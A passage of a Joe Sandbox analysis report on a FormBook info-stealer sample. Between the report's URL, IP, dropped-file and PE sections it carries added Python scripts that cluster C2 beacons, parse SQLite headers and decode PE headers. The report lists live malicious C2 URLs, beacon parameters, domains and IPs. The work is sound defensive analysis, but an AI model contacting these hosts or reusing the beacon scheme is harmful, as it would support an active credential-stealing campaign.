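    "http://www.languyenthuyduyen.xyz/zxna/?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2VdCpkOUvznzx121WAOLhD3akGih7YK2UBiYRo2lJdrH1gL64cuqcjDePyZUHX/QJDU8k+qCwrYmvEQGfXWN0kwHy8MBDYStPNdJHxaZ4=",
]

# Resolved entries from the report's domain table.
DOMAIN_IPS = {
    "www.languyenthuyduyen.xyz": "103.255.237.233",
    "www.ntn.solar": "199.59.243.227",
    "asociacia.online": "81.2.196.19",
    "mybartendinglife.club": "3.33.130.190",
    "technew.shop": "45.56.219.238",
    "thepeatear.online": "84.32.84.32",
    "www.firstcry.shop": "13.248.169.48",
    "doggieradio.net": "3.33.130.190",
    "www.allpop.xyz": "162.0.238.43",
    "agilizeimob.app": "84.32.84.32",
    "030002304.xyz": "65.21.196.90",
    "www.kx507981.shop": "54.67.42.145",
    "www.bayarcepat19.click": "104.21.77.69",
    "teerra.shop": "3.33.130.190",
}


def split_query_raw(query):
    """Split k=v&k=v without percent or plus decoding, so the opaque nhl value
    (which carries '+', '/' and trailing '=') is preserved byte for byte."""
    pairs = {}
    for part in query.split("&"):
        if part:
            k, _, v = part.partition("=")
            pairs[k] = v
    return pairs


def parse_beacon(url):
    """Extract host, first path segment, the fixed id value and the raw blob."""
    u = urlsplit(url)
    segs = [s for s in u.path.split("/") if s]
    q = split_query_raw(u.query)
    return {"host": u.hostname, "path_token": segs[0] if segs else "",
            "id": q.get("9X"), "blob": q.get("nhl")}


def resolve(host):
    """Exact lookup first, then the bare apex for a www. host (assumption of this
    example: the report resolves the apex but not the www. name for several hosts)."""
    if host in DOMAIN_IPS:
        return DOMAIN_IPS[host]
    bare = host[4:] if host.startswith("www.") else host
    return DOMAIN_IPS.get(bare)


def cluster(urls):
    parsed = [parse_beacon(u) for u in urls]
    by_ip = defaultdict(set)
    for p in parsed:
        ip = resolve(p["host"])
        if ip:
            by_ip[ip].add(p["host"])
    return {
        "hosts": sorted({p["host"] for p in parsed}),
        "path_tokens": {p["host"]: p["path_token"] for p in parsed},
        "ids": {p["id"] for p in parsed if p["id"]},
        "shared_ips": {ip: sorted(h) for ip, h in by_ip.items() if len(h) > 1},
    }


if __name__ == "__main__":
    result = cluster(FLAGGED_URLS)
    print("shared id values:", result["ids"])
    for ip, hosts in result["shared_ips"].items():
        print(ip, "hosts", ", ".join(hosts))
```

On the report's data the single id value ties all seven hosts together, and two IPs (3.33.130.190 and 84.32.84.32) each serve more than one of them, which is the pivot to use when extending a block list beyond the hosts this one sample happened to contact.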
Name | Source | Malicious | Antivirus Detection | Reputation
Every entry below is marked Malicious: false, with no antivirus detection and Reputation: unknown. Strings that the report lists fused (two URLs back to back) are reproduced as found in memory.
https://duckduckgo.com/chrome_newtab
  source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
  source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp
https://duckduckgo.com/ac/?q=
  source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp
http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2Vd
  source: choice.exe, 00000005.00000002.708581961090.0000000005CE8000.00000004.10000000.00040000.00000000.sdmp; SjhnWvlTMw.exe, 00000006.00000002.708580526921.00000000036C8000.00000004.00000001.00040000.00000000.sdmp
http://www.agilizeimob.app
  source: SjhnWvlTMw.exe, 00000006.00000002.708576743698.0000000000F63000.00000040.80000000.00040000.00000000.sdmp
https://www.google.com
  source: choice.exe, 00000005.00000002.708581961090.00000000064C2000.00000004.10000000.00040000.00000000.sdmp; SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000003EA2000.00000004.00000001.00040000.00000000.sdmp
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
  source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp
http://x1.c.lencr.org/0
  source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp
http://x1.i.lencr.org/0
  source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp
http://c.pki.goog/r/r1.crl0
  source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp
http://i.pki.goog/r1.crt0
  source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
  source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp
http://crl.rootca1.amazontrust.com/rootca1.crl0
  source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp
http://ocsp.rootca1.amazontrust.com0:
  source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp
https://www.ecosia.org/newtab/
  source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp
http://kx507945.shop
  source: choice.exe, 00000005.00000002.708581961090.0000000006C9C000.00000004.10000000.00040000.00000000.sdmp; SjhnWvlTMw.exe, 00000006.00000002.708580526921.000000000467C000.00000004.00000001.00040000.00000000.sdmp
https://www.google.com/favicon.ico
  source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp
https://ac.ecosia.org/autocomplete?q=
  source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp
https://zingara.life/c0mi?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zs
  source: choice.exe, 00000005.00000002.708581961090.0000000006978000.00000004.10000000.00040000.00000000.sdmp; SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000004358000.00000004.00000001.00040000.00000000.sdmp
http://crt.rootca1.amazontrust.com/rootca1.cer0?
  source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
  source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp
https://gemini.google.com/app?q=
  source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
162.0.238.43 | www.allpop.xyz | Canada | 22612 | NAMECHEAP-NETUS | true
13.248.169.48 | www.firstcry.shop | United States | 16509 | AMAZON-02US | true
103.255.237.233 | www.languyenthuyduyen.xyz | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | true
65.21.196.90 | 030002304.xyz | United States | 199592 | CP-ASDE | true
45.56.219.238 | technew.shop | Canada | 13768 | COGECO-PEER1CA | true
199.59.243.227 | www.ntn.solar | United States | 395082 | BODIS-NJUS | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
84.32.84.32 | thepeatear.online | Lithuania | 33922 | NTT-LT-ASLT | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
3.33.130.190 | mybartendinglife.club | United States | 8987 | AMAZONEXPANSIONGB | true
54.67.42.145 | www.kx507981.shop | United States | 16509 | AMAZON-02US | true
104.21.77.69 | www.bayarcepat19.click | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529811
Start date and time: 2024-10-09 12:56:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: 8EhMjL3yNF.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@18/12
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 45
• Number of non-executed functions: 288
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): self.events.data.microsoft.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com
• Execution Graph export aborted for target SjhnWvlTMw.exe, PID 6828 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: 8EhMjL3yNF.exe
Time | Type | Description
07:02:01 | API Interceptor | 20308281x Sleep call for process: choice.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
162.0.238.43 | RQ#071024.exe | Get hash | malicious | FormBook | Browse | www.tomtox.top/3nd4/?O47=wX8jjEADFIUNbB1fuwn27lCA5Ee2RiJ4qVOVM3qHbtn5VxkeI5MaAkn7o3WZs+Yr7x4eULr6m9MYlnr0WXfs/nrrtX3ZRdR1xibdPs5ToUAPuDeUSg==&LT=aZbPzzPX3H
162.0.238.43 | Quote #260924.exe | Get hash | malicious | FormBook | Browse | www.tomtox.top/3nd4/
162.0.238.43 | Quote #270924.exe | Get hash | malicious | FormBook | Browse | www.tomtox.top/3nd4/
162.0.238.43 | Product Data Specifications_PDF.exe | Get hash | malicious | FormBook | Browse | www.mandemj.top/to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ
162.0.238.43 | PO5118000306 pdf.exe | Get hash | malicious | FormBook | Browse | www.storestone.xyz/pd4o/
162.0.238.43 | QlHhDu2uh1.exe | Get hash | malicious | FormBook | Browse | www.mandemj.top/to69/?vlJ0J=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB6xmvPC7jVOY3WNYEUB78n7uOkwblrlFm/iycyJOk57iLJ//IZc=&HDJP=Pnl8G6jPyrn
162.0.238.43 | BL Draft-Invoice-Packing list-Shipping Document.pif.exe | Get hash | malicious | FormBook | Browse | www.mechecker.life/b6h1/
162.0.238.43 | 2nd RFQ TECMARKQATAR PO33218_PDF.exe | Get hash | malicious | FormBook | Browse | www.mandemj.top/to69/?mnShvP=jnxbIh9toY3Lk087BKTBUwMLIQNntOIIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXTMZnvKu4jSfDtGBlDX578zWDJUwflrx6suU=&Cbj=nB9LWdWpMT7tUBt
162.0.238.43 | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | Get hash | malicious | FormBook | Browse | www.mandemj.top/to69/?VzA=dz5HvTSP4ZdlFHDP&RD4=jnxbIh9toY3Lk087BKTBUwMLIQNntOIIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXTMZnvKu4jSfDtGBlDX578zWDJUwflrx6suU=
162.0.238.43 | x.exe | Get hash | malicious | FormBook | Browse | www.withad.xyz/r0nv/
13.248.169.48 | BAJFMONYm2.exe | Get hash | malicious | FormBook | Browse | www.jacquesjanine.online/ey4t/
13.248.169.48 | fJD7ivEnzm.exe | Get hash | malicious | FormBook | Browse | www.dyme.tech/h7lb/
13.248.169.48 | jpdy1E8K4A.exe | Get hash | malicious | FormBook | Browse | www.dyme.tech/h7lb/
13.248.169.48 | Pending invoices.exe | Get hash | malicious | FormBook | Browse | www.extrem.tech/lwlk/
13.248.169.48 | Arrival Notice.exe | Get hash | malicious | FormBook | Browse | www.firstcry.shop/e4x0/
13.248.169.48 | presupuesto urgente.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.sleephygienist.org/9ned/
13.248.169.48 | -pdf.bat.exe | Get hash | malicious | FormBook | Browse | www.invicta.world/tcs6/
13.248.169.48 | payment copy.exe | Get hash | malicious | FormBook | Browse | www.firstcry.shop/e4x0/
13.248.169.48 | Arrival Notice_pdf.exe | Get hash | malicious | FormBook | Browse | www.invicta.world/aohi/
13.248.169.48 | shipping documents_pdf.exe | Get hash | malicious | FormBook | Browse | www.mynotebook.shop/3q2o/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.languyenthuyduyen.xyz | RN# D7521-RN-00353 REV-2.exe | Get hash | malicious | FormBook | Browse | 103.255.237.233
www.languyenthuyduyen.xyz | HBLAWBP.LISTCOC & INV.exe | Get hash | malicious | FormBook | Browse | 103.255.237.233
www.languyenthuyduyen.xyz | NEW ORDERS scan_29012019.exe | Get hash | malicious | FormBook | Browse | 103.255.237.233
www.firstcry.shop | Arrival Notice.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
www.firstcry.shop | payment copy.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
shops.myshopify.com | Arrival Notice.exe | Get hash | malicious | FormBook | Browse | 23.227.38.74
shops.myshopify.com | payment copy.exe | Get hash | malicious | FormBook | Browse | 23.227.38.74
shops.myshopify.com | ORDER ENQUIRY.exe | Get hash | malicious | FormBook | Browse | 23.227.38.74
shops.myshopify.com | https://ebookkeepers.com.pk/ | Get hash | malicious | Unknown | Browse | 23.227.38.74
shops.myshopify.com | http://fix-bill.com/ | Get hash | malicious | Unknown | Browse | 23.227.38.74
shops.myshopify.com | H9DsG7WKGt.exe | Get hash | malicious | FormBook | Browse | 23.227.38.74
shops.myshopify.com | https://cancelar-plan-pr0teccion1.w3spaces.com/ | Get hash | malicious | Unknown | Browse | 23.227.38.74
shops.myshopify.com | ORDER_1105-19-24-3537.pdf.exe | Get hash | malicious | FormBook | Browse | 23.227.38.74
shops.myshopify.com | Specification and Quantity Pdf.exe | Get hash | malicious | FormBook | Browse | 23.227.38.74
shops.myshopify.com | r8ykXfy52F9CXd5d.exe | Get hash | malicious | FormBook | Browse | 23.227.38.74
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CP-ASDE | BILL OF LADDING.exe | malicious | FormBook | 65.21.196.90
 | https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFnDa0TAMLVO9WtBTyYEZqZA-3DPrnv_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOmYNN4Eos0I-2F5FhDJBI4w4qadztSYeu4ugOMJrD5ZJ3NK5HbR-2B5js4EjZpFmlZJIJ2eepX0b1t3SsV5gyIJGc7CJjeC8X5Wxzv49-2FqOYJzl5qBXpr-2BWwAW7G6cWDOqZN4YK73LjV4xBBNvL9fcHX0SM3SHQjbhXBuKD0dh5WqiuRgt8l7OsZEvxy8UkJaur7KIBjJyVTij7zCSJnYd6mjsUFQl8fAjX9eSOEGKjy2XWh8GHa2xi9VgTVCxGMcn7gM-3D | malicious | Unknown | 65.21.29.43
 | BAJFMONYm2.exe | malicious | FormBook | 65.21.196.90
 | 5FRWRDOqk7.exe | malicious | FormBook | 65.21.196.90
 | RQ#071024.exe | malicious | FormBook | 65.21.196.90
 | http://dmed-industries.com | malicious | HtmlDropper | 65.21.29.43
 | Arrival notice.exe | malicious | FormBook | 65.21.196.90
 | https://jumatan.sudaha.biz.id/4F741t%23XjCw%5BYg/ | malicious | Unknown | 65.21.235.194
 | rpedido-002297.exe | malicious | FormBook, GuLoader | 65.21.196.90
 | https://www.elightsailorsbank.uksfholdings.com/ | malicious | Unknown | 65.21.85.206
VNPT-AS-VNVNPTCorpVN | na.elf | malicious | Unknown | 14.172.101.50
 | hPIF0APgJk.elf | malicious | Unknown | 113.166.174.161
 | Dekont.pdf.exe | malicious | FormBook | 203.161.41.254
 | T9W7MCS2HI.exe | malicious | FormBook | 203.161.43.245
 | na.elf | malicious | Unknown | 14.239.124.27
 | na.elf | malicious | Unknown | 123.18.105.224
 | na.elf | malicious | Unknown | 123.30.215.227
 | na.elf | malicious | Unknown | 123.18.32.94
 | na.elf | malicious | Unknown | 14.237.37.78
 | na.elf | malicious | Mirai | 14.185.207.165
AMAZON-02US | file.exe | malicious | Credential Flusher | 52.222.236.120
 | file.exe | malicious | Credential Flusher | 52.222.236.23
 | BILL OF LADDING.exe | malicious | FormBook | 52.13.151.179
 | file.exe | malicious | Unknown | 52.222.236.23
 | file.exe | malicious | Unknown | 52.222.236.80
 | FW Document shared with you Remote Work Policy Update.msg | malicious | HTMLPhisher | 52.16.10.74
 | file.exe | malicious | Credential Flusher | 52.222.236.120
 | file.exe | malicious | Credential Flusher | 52.222.236.23
 | https://logverification.weebly.com/ | malicious | HTMLPhisher | 44.240.81.212
 | file.exe | malicious | Unknown | 52.222.236.120
NAMECHEAP-NETUS | lPX6PixV4t.exe | malicious | FormBook | 199.192.21.169
 | LegionLoader (13).msi | malicious | Unknown | 162.255.119.168
 | LegionLoader (14).msi | malicious | Unknown | 162.255.119.168
 | LegionLoader (15).msi | malicious | Unknown | 162.255.119.168
 | LegionLoader (10).msi | malicious | Unknown | 162.255.119.168
 | LegionLoader (11).msi | malicious | Unknown | 162.255.119.168
 | LegionLoader (12).msi | malicious | Unknown | 162.255.119.168
 | LegionLoader (9).msi | malicious | Unknown | 162.255.119.168
 | LegionLoader (2).msi | malicious | Unknown | 162.255.119.168
 | LegionLoader.msi | malicious | Unknown | 162.255.119.168
No context
No context
Process:C:\Windows\SysWOW64\choice.exe
File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
Category:dropped
Size (bytes):229376
Entropy (8bit):0.9085960794285802
Encrypted:false
SSDEEP:384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
MD5:17091CB4BC9C6E80CA91C12E0BBA56F4
SHA1:ED7E485630B1245C7AE963FB02C899BF141DB578
SHA-256:551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
SHA-512:A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
Malicious:false
Reputation:low
                                                                                                                                                                Preview:SQLite format 3......@ .......m...........b......................................................v............i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
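The File Type line above is file(1)'s rendering of the 100-byte SQLite header, and the triage point is the writer: choice.exe is a console utility with no reason to write a SQLite database, which fits the report's "Tries to harvest and steal browser information" signature (Chromium-based browsers keep history and saved logins in SQLite files). The parser below is an added example, not part of the Joe Sandbox report. It decodes the same header fields and also cross-checks the header's page count against the file size, which for this file (229376 bytes at 2048 bytes per page) is three pages more than the header records, the kind of inconsistency a copy of a database that is still being written can show. The header bytes are constructed from the values in the report; the real file is not needed.

```python
"""Decode the 100-byte SQLite 3 file header behind the 'File Type' line of the
dropped database. Added example; not part of the Joe Sandbox report."""
import struct

SQLITE_MAGIC = b"SQLite format 3\x00"
_HEADER = struct.Struct(">16sH6B12I20s2I")      # exactly 100 bytes, big-endian
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}

def parse_sqlite_header(data):
    """Return the header fields file(1) prints; raise ValueError on non-SQLite input."""
    if len(data) < _HEADER.size:
        raise ValueError("need at least 100 bytes")
    f = _HEADER.unpack_from(data)
    if f[0] != SQLITE_MAGIC:
        raise ValueError("not a SQLite 3 database")
    page_size = 65536 if f[1] == 1 else f[1]    # 65536 is stored as 1
    u32 = f[8:20]                               # the twelve u32 fields at offsets 24..71
    return {
        "page_size": page_size,
        "change_counter": u32[0],     # offset 24: bumped on every write transaction
        "page_count": u32[1],         # offset 28: size in pages (see size_check)
        "schema_cookie": u32[4],      # offset 40: bumped on every schema change
        "schema_format": u32[5],      # offset 44
        "encoding": ENCODINGS.get(u32[8], f"unknown({u32[8]})"),   # offset 56
        "version_valid_for": f[21],   # offset 92
        "sqlite_version": f[22],      # offset 96: SQLITE_VERSION_NUMBER of the last writer
    }

def version_string(n):
    """SQLITE_VERSION_NUMBER is major*1000000 + minor*1000 + release."""
    return f"{n // 1000000}.{(n // 1000) % 1000}.{n % 1000}"

def describe(h):
    """Same wording as the report's File Type line, so the two can be diffed."""
    return (f"SQLite 3.x database, last written using SQLite version {h['sqlite_version']}, "
            f"page size {h['page_size']}, file counter {h['change_counter']}, "
            f"database pages {h['page_count']}, cookie 0x{h['schema_cookie']:x}, "
            f"schema {h['schema_format']}, {h['encoding']}, "
            f"version-valid-for {h['version_valid_for']}")

def size_check(h, file_size):
    """Pages on disk beyond what the header accounts for (0 when consistent).
    The in-header page count is only valid when version_valid_for equals the
    change counter and the count is non-zero; return None when that does not hold."""
    if h["page_count"] == 0 or h["version_valid_for"] != h["change_counter"]:
        return None
    return file_size // h["page_size"] - h["page_count"]

# Constructed header carrying the values the report shows for the dropped file;
# the remaining 229,276 bytes of the real file are not needed to exercise the parser.
REPORT_HEADER = _HEADER.pack(
    SQLITE_MAGIC, 2048,
    1, 1, 0, 64, 32, 32,                        # write/read versions, reserved, payload fractions
    6, 109, 0, 0, 0x62, 4, 0, 0, 1, 0, 0, 0,    # counter, pages, freelist x2, cookie, schema fmt,
                                                # cache, largest root, encoding=UTF-8, user ver,
                                                # incremental vacuum, application id
    b"\x00" * 20,
    6, 3045002,                                 # version-valid-for, SQLITE_VERSION_NUMBER (3.45.2)
)
REPORT_FILE_SIZE = 229376

if __name__ == "__main__":
    h = parse_sqlite_header(REPORT_HEADER)
    print(describe(h))
    print("last writer:", version_string(h["sqlite_version"]))
    print("pages on disk not covered by header:", size_check(h, REPORT_FILE_SIZE))
```

Run it against a real dropped file by passing the first 100 bytes to parse_sqlite_header and the file's length to size_check; a None from size_check means the header's page count cannot be trusted and the file needs to be opened with the sqlite3 module instead.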
Process:C:\Users\user\Desktop\8EhMjL3yNF.exe
File Type:data
Category:dropped
Size (bytes):286720
Entropy (8bit):7.991783389229631
Encrypted:true
SSDEEP:6144:yFt4juKvfI8TmWSCIsGrz6s1QpuLR25brvZgPoOrFpnEiACU1kts:yTGVvDVLIsgzV1QpAR2hriIiV8ss
MD5:09639C48ED1148928224A5BD684B6C8D
SHA1:DECAEADB8252B5EBDD731E2C3D7CB54BAA6D82F8
SHA-256:27CA67F14E80FB3F18907988EAF364488F894D625EAAD871F3DF6289CFBA16E1
SHA-512:792F8552E5FC9E33734B98D97DA6FF9BCA75AC05716A4C43243329B18E782287C2CF55D70264D9CC8C1CC67495977089D002C35AABA23BC4E9A84B05AA77C30E
Malicious:false
Reputation:low
                                                                                                                                                                Preview:|..j.U027...Z......Q2...}V8...1MS8UU027Q1MS8UU027Q1MS8UU027Q.MS8[J.<7.8.r.T...c9X>sH':W@V<..2V;:D.U4.?&Vu<^.s.bm>W10.?:[.MS8UU02NP8.nX2..RP..-4.O...1V.I....RP.+...i5W.e8R%nX2.027Q1MS8..02{P0Ms...027Q1MS8.U23<P:MSvQU027Q1MS8.A027A1MSXQU02wQ1]S8UW021Q1MS8UU627Q1MS8U5427S1MS8UU22w.1MC8UE027Q!MS(UU027Q!MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1M}L0-D27Q..W8UE027.5MS(UU027Q1MS8UU02.Q1-S8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.5265688883824255
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:8EhMjL3yNF.exe
File size:1'336'099 bytes
MD5:adf7951566b1bb643b3fc555987cbddc
SHA1:29d6e8e48400e531e35b129781528dd3f10fc08b
SHA256:84ced43584331241219ef94bb7d214d96f1c5f4fdbc9adc0bb9d5fcd5cb0f27c
SHA512:33ec3005a66f22ce740a5b18d9f8cbce1c638ca1505d40a3b982722ac6973acd39a46978ffe6e03ea74267c0be705513bd635fcc9b0f0e077770a8605f288893
SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCkLD+t9x2FlenXm+sgt4xfPGCiox/qOfL7q6XgEy:7JZoQrbTFZY1iaCWxinW+sssnGCipOfq
TLSH:9B55F122B5D68076C2F327B19E7EF76A9A3D79360326D29723C42D315EA05412B39733
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
Icon Hash:1733312925935517
Entrypoint:0x4165c1
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
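The static fields above come straight from the COFF and optional headers, and two of them carry a security reading the report does not spell out: DLL Characteristics lists only TERMINAL_SERVER_AWARE, so neither DYNAMIC_BASE (ASLR opt-in) nor NX_COMPAT (DEP opt-in) is set, and RELOCS_STRIPPED means the image could not be rebased even if it asked to be. The Time Stamp is a header field under the author's control, so the 2012 date is weak evidence of when the sample was actually built. The entry-point listing that follows (a call, a jmp, then int3 padding) matches the shape of a stock MSVC CRT start stub, so the code worth reading is not at the entry point. The script below is an added example, not part of the report or of any Joe Sandbox code: it parses a constructed PE32 header carrying the report's values, decodes the flag words and the timestamp, lists the mitigations the image does not opt into, and computes the 8-bit Shannon entropy behind the Entropy lines of the sample and of the two dropped files (0.91 for the sparse SQLite file, 7.99 for the payload the report marks Encrypted: true). Both the header and the entropy inputs are constructed.

```python
"""Decode the PE32 header fields shown in the static-info block and list the
missing mitigations. Added example; not part of the Joe Sandbox report."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# IMAGE_FILE_* (COFF Characteristics) and IMAGE_DLLCHARACTERISTICS_* bit values
FILE_FLAGS = [(0x0001, "RELOCS_STRIPPED"), (0x0002, "EXECUTABLE_IMAGE"),
              (0x0020, "LARGE_ADDRESS_AWARE"), (0x0100, "32BIT_MACHINE"),
              (0x2000, "DLL")]
DLL_FLAGS = [(0x0020, "HIGH_ENTROPY_VA"), (0x0040, "DYNAMIC_BASE"),
             (0x0080, "FORCE_INTEGRITY"), (0x0100, "NX_COMPAT"),
             (0x0400, "NO_SEH"), (0x4000, "GUARD_CF"),
             (0x8000, "TERMINAL_SERVER_AWARE")]
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}

def flag_names(value, table):
    return [name for bit, name in table if value & bit]

def timestamp_utc(ts):
    """COFF TimeDateStamp is seconds since the Unix epoch; the report prints it in UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")

def parse_pe(data):
    """Minimal PE32 header walk: DOS header -> e_lfanew -> COFF header -> optional header."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 60)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    machine, _, ts, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic != 0x10B:
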